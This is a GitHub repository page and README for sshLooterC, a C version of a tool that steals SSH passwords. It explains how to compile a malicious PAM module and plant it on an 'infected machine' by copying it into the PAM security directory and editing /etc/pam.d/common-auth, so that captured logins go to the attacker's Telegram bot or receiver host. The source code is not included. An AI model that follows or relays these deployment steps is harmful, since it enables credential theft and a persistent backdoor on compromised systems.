aplyc1a / sshLooterC

It's the C version of https://github.com/mthbernardes/sshLooter

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

SSHLooter C version

It's the C version of sshLooter, which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version, you compile it on your machine and send it to the infected machine without installing any dependencies.

Dependencies

  • gcc
  • libcurl4-openssl-dev
  • libpam0g-dev

Configure

Edit the looter.c and add your telegram bot token and your user id.

In this way, you need to edit the looter.c and add your RECVER_HOST and RECVER_PORT.
Please note that this is not safe. Only help you test usability. --- aplyc1a

Compiling

make

Usage

Copy the looter.so to the infected machine on /lib/xxx/security, then edit the /etc/pam.d/common-auth and add the following lines.

auth optional module.so
account optional module.so

About

It's the C version of https://github.com/mthbernardes/sshLooter


Languages

Language:C 95.9%Language:Makefile 4.1%